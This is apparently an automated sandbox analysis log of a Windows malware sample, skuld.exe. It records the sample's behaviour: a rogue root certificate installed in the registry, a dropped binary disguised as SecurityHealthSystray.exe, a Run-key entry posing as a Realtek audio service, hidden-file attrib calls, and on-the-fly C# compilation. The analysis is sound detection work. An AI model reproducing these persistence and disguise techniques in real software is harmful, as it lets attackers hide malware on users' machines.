                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: skuld.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: skuld.exeStatic file information: File size 10810368 > 1048576
                        Source: skuld.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x4f5400
                        Source: skuld.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x49f400
                        Source: skuld.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: \de.pdb- source: powershell.exe, 0000000D.00000002.1750605132.000001CAF7485000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.pdb source: powershell.exe, 0000000D.00000002.1594297796.000001CAE07C4000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.pdbhPtC source: powershell.exe, 0000000D.00000002.1594297796.000001CAE07C4000.00000004.00000800.00020000.00000000.sdmp
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline"
                        Source: skuld.exeStatic PE information: section name: .xdata
                        Source: skuld.exeStatic PE information: section name: .symtab
                        Source: SecurityHealthSystray.exe.0.drStatic PE information: section name: .xdata
                        Source: SecurityHealthSystray.exe.0.drStatic PE information: section name: .symtab

                        Persistence and Installation Behavior

                        barindex
                        Installs new ROOT certificates
                        Source: C:\Users\user\Desktop\skuld.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Uses cmd line tools excessively to alter registry or file data
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: attrib.exe
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: attrib.exe
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: attrib.exe
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: attrib.exe
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: attrib.exeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: attrib.exeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: attrib.exeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: attrib.exeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.dllJump to dropped file
                        Source: C:\Users\user\Desktop\skuld.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\partmgrJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal ServiceJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal ServiceJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\skuld.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
